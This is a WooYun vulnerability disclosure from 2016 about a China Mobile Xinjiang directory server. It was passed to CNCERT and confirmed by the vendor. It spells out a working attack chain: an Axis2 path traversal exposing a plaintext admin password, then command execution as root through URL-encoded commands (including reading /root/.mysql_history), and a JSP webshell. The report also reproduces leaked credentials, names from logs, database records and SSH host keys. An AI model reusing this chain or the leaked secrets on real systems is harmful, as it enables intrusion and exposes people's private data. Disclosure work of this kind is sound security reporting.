当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0202397

漏洞标题:中国移动通信集团新疆集团通讯录某处文件包含导致命令执行Getshell

相关厂商:中国移动

漏洞作者: 路人甲

提交时间:2016-04-27 19:20

修复时间:2016-06-13 10:50

公开时间:2016-06-13 10:50

漏洞类型:文件包含

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-27: 细节已通知厂商并且等待厂商处理中
2016-04-29: 厂商已经确认,细节仅向厂商公开
2016-05-09: 细节向核心白帽子及相关领域专家公开
2016-05-19: 细节向普通白帽子公开
2016-05-29: 细节向实习白帽子公开
2016-06-13: 细节向公众公开

简要描述:

中国移动通信集团新疆集团通讯录某处文件包含导致命令执行Getshell

详细说明:

中国移动通信集团新疆有限公司 技术支持
**.**.**.**:8080/

0.png


**.**.**.**:8080/axis2/services/Version?xsd=../conf/axis2.xml

<parameter name="userName">jttxl_axis_username</parameter><parameter name="password">axisSf*sji3255</parameter>


1.png


**.**.**.**:8080/axis2/axis2-admin/listService
登录 axis2、

2.png


**.**.**.**:8080//axis2/services/Cat/exec?cmd=whoami
root 权限

3.png


/opt/apache-tomcat-7.0.55/webapps/axis2/WEB-INF/classes/

4.png


下面还存在文件遍历、4
**.**.**.**:8080/download/

5.png


**.**.**.**:8080/download/indextomcat.jsp
直接getshell、

6.png


**.**.**.**:8080/Group/logs/smms.log
日志泄漏信息
[jdbc:mysql**.**.**.**:3306/jttxl?useUnicode=true&characterEncoding=UTF-8]]
[2016-04-27 01:00:10,674] [DEBUG] [sql.ResultSet ] [{rset-100050} Result: [08558047627791600147, 张丽,魏爱东等]]
[2016-04-27 01:00:10,674] [DEBUG] [sql.ResultSet ] [{rset-100050} Result: [99021592896422007516, 魏国孝,王檬等]]

8.png


**.**.**.**:8080/fileser/resources/imagehttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/
文件遍历信息泄漏、

9.png


10.png


**.**.**.**:8080//axis2/services/Cat/exec?cmd=cat%20%20/root/.mysql_history
linux中mysql记录、

NULL COMMENT '新疆移动二级部门',
  `area_code` varchar(10) DEFAULT NULL COMMENT '地州编码',
  `area_name` varchar(64) DEFAULT NULL COMMENT '地州名称',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
CREATE TABLE `sys_dept_area_info` (   `id` varchar(32) NOT NULL,   `department_name` varchar(64) NOT NULL COMMENT '新疆移动二级部门',   `area_code` varchar(10) DEFAULT NULL COMMENT '地州编码',   `area_name` varchar(64) DEFAULT NULL COMMENT '地州名称',   PRIMARY KEY (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8;
INSERT INTO `sys_dept_area_info` VALUES ('8a1896523c29d5ec013c29da5f0f0000', '乌鲁木齐市分公司', '6501', '乌鲁木齐');
INSERT INTO `sys_dept_area_info` VALUES ('8a1896523c29d5ec013c29da5f0f0001', '阿克苏分公司', '6529', '阿克苏');
INSERT INTO `sys_dept_area_info` VALUES ('8a1896523c29d5ec013c29da5f0f0002', '区公司', '6501', '乌鲁木齐');
INSERT INTO `sys_dept_area_info` VALUES ('8a1896523c29d5ec013c29da5f0f0003', '新开户', '6501', '乌鲁木齐');
INSERT INTO `sys_dept_area_info` VALUES ('8a1896523c29d5ec013c29da5f0f0004', '阿勒泰分公司', '6543', '阿勒泰');
INSERT INTO `sys_dept_area_info` VALUES ('8a1896523c29d5ec013c29da5f0f0005', '巴州分公司', '6528', '巴州');
INSERT INTO `sys_dept_area_info` VALUES ('8a1896523c29d5ec013c29da5f0f0006', '博州移动公司', '6527', '博州');
INSERT INTO `sys_dept_area_info` VALUES ('8a1896523c29d5ec013c29da5f0f0007', '昌吉分公司', '6523', '昌吉');
INSERT INTO `sys_dept_area_info` VALUES ('8a1896523c29d5ec013c29da5f0f0008', '哈密分公司', '6522', '哈密');
INSERT INTO `sys_dept_area_info` VALUES ('8a1896523c29d5ec013c29da5f0f0009', '和田分公司', '6532', '和田');
INSERT INTO `sys_dept_area_info` VALUES ('8a1896523c29d5ec013c29da5f0f0010', '喀什分公司', '6531', '喀什');
INSERT INTO `sys_dept_area_info` VALUES ('8a1896523c29d5ec013c29da5f0f0011', '克拉玛依分公司', '6502', '克拉玛依');
INSERT INTO `sys_dept_area_info` VALUES ('8a1896523c29d5ec013c29da5f0f0012', '克州移动', '6530', '克州');
INSERT INTO `sys_dept_area_info` VALUES ('8a1896523c29d5ec013c29da5f0f0013', '奎屯分公司', '654003', '奎屯');
INSERT INTO `sys_dept_area_info` VALUES ('8a1896523c29d5ec013c29da5f0f0014', '石河子分公司', '659001', '石河子');


11.png


信任连接、

**.**.**.**]:30000 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApWKcM1Ltsn0e8D32Yn4ZnAIcdMKfuGTQ5/S4thMk0mgl2RRljKFjKvy4ElkN1HS9/2bQ8iL3gOWHVGUYm9Nh9izMhPO6E6Z6o3wwpaxmKhJQVRbbWsQ+07widH7AAs8IP5dTJ8OjcEawcknnjorZaAn7xvotA+mTbPL8Kag8Bn2Sp4Ln44VQB2bATBq6kHUf1f3z+tFzyjMDkOjSb6RPCNYN4kEaglL0RgE71SpoLTg4VQ1s662rdTifDtFRR0kj8CJi0DkdvMKKmWwa6eMak92ScD4EmBNkOOGpJT2d1d7nprvyK4DtMumTSjEMhYjGdB/x3yAh87Pr7/3QrMQLgw==
[**.**.**.**]:30000 ssh-rsa


12.png


ok

漏洞证明:

上面的了

修复方案:

升级axis2!

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2016-04-29 10:46

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置。

最新状态:

暂无

漏洞评价:

评价